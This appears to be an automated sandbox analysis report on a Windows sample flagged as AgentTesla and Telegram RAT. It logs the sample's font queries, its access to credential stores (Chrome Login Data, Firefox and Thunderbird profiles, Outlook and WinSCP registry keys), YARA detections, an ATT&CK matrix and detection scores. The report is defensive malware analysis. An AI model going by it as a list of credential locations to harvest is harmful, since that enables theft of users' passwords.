            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Users\user\Desktop\Smh3IA9098.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeCode function: 1_2_02AAF088 GetUserNameW,1_2_02AAF088

            Stealing of Sensitive Information

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Users\user\Desktop\Smh3IA9098.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: Yara matchFile source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		Path Interception111
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Web Service            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		1
            Credentials in Registry            		131
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration1
            Ingress Tool Transfer            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
            Process Injection            		NTDS1
            Account Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer3
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            System Owner/User Discovery            		SSHKeyloggingData Transfer Size Limits14
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common2
            Software Packing            		Cached Domain Credentials1
            Remote System Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem114
            System Information Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Smh3IA9098.exe33%ReversingLabsWin32.Trojan.AgentTesla
            Smh3IA9098.exe42%VirustotalBrowse
            Smh3IA9098.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.Smh3IA9098.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            https://api.telegram.org40%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
